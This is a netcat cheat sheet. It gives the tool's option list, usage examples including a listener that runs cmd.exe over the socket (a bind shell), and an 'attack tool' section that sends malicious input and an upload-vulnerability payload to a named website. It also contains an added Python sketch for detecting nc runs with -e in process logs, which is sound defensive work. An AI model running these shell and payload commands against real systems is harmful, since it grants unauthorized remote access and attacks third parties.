Command parameters
connect to somewhere: nc [-options] hostname port[s] [ports] …
listen for inbound: nc -l -p port [options] [hostname] [port]
options:
-d detach from console, background mode
-e prog inbound program to exec [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-L listen harder, re-listen on socket close
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
Usage
Connect to a specific port on a host
nc -vv 192.168.83.129 3000
Listen on a local port; typically used to receive a reverse connection
nc -l -p 3000
Listen on a port and execute a specific program once a client connects via telnet
nc -l -p 1314 -t -e cmd.exe
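The -e option that the help text marks [dangerous!!] is what wires a program such as cmd.exe to the socket, so it is the flag worth alerting on in process-creation logs. The following Python triage sketch is an added example, not part of the original page or of netcat itself; it approximates nc's getopt-style parsing using the option table above, and the sample command lines (including the C:\tools path) are constructed.

```python
import shlex
from pathlib import PureWindowsPath

ARG_OPTS = set("egGiopsw")    # options that take a value, per the help text
NC_NAMES = {"nc", "nc.exe"}   # assumption: the binary has not been renamed

def parse_nc(cmdline):
    """Parse getopt-style nc arguments; return None if the image is not nc."""
    tokens = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    if not tokens or PureWindowsPath(tokens[0]).name.lower() not in NC_NAMES:
        return None
    flags, values, rest, i = set(), {}, [], 1
    while i < len(tokens):
        tok = tokens[i]
        i += 1
        if len(tok) < 2 or not tok.startswith("-"):
            rest.append(tok)              # hostname or port
            continue
        for pos, ch in enumerate(tok[1:], start=1):
            flags.add(ch)
            if ch in ARG_OPTS:            # value is inline ("-p80") or the next token
                if tok[pos + 1:]:
                    values[ch] = tok[pos + 1:]
                elif i < len(tokens):
                    values[ch] = tokens[i]
                    i += 1
                break
    return flags, values, rest

def classify(cmdline):
    """Label an nc invocation by how much attention it deserves."""
    parsed = parse_nc(cmdline)
    if parsed is None:
        return "not-nc"
    flags, _, _ = parsed
    listening = bool(flags & {"l", "L"})
    if "e" in flags:                      # a program is attached to the socket
        return "exec-on-listen" if listening else "exec-on-connect"
    if "L" in flags:
        return "persistent-listener"      # re-listens after each close
    return "listener" if listening else "client"

SAMPLES = [  # constructed process-creation command lines
    r"nc -vv 192.168.83.129 3000",
    r"C:\tools\nc.exe -l -p 1314 -t -e cmd.exe",
    r"nc -lp 3000 -e cmd.exe",
    r"nc.exe -L -p 80",
    r"notepad.exe -e notes.txt",
]

def alerts(lines):
    """Return the command lines in which nc runs a program via -e."""
    return [c for c in lines if classify(c).startswith("exec-")]
```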
As an attack tool
Send malicious code to port 80
type c:\test.txt | nc -nvv 127.0.0.1 80
nc -L -p 80 > c:\log.txt
Identify the remote server's type
nc -vv www.lzhword.cn 80
Submit data (upload vulnerability); < redirects the contents of 1.txt to nc
nc.exe -vv www.lzhword.cn 80 < 1.txt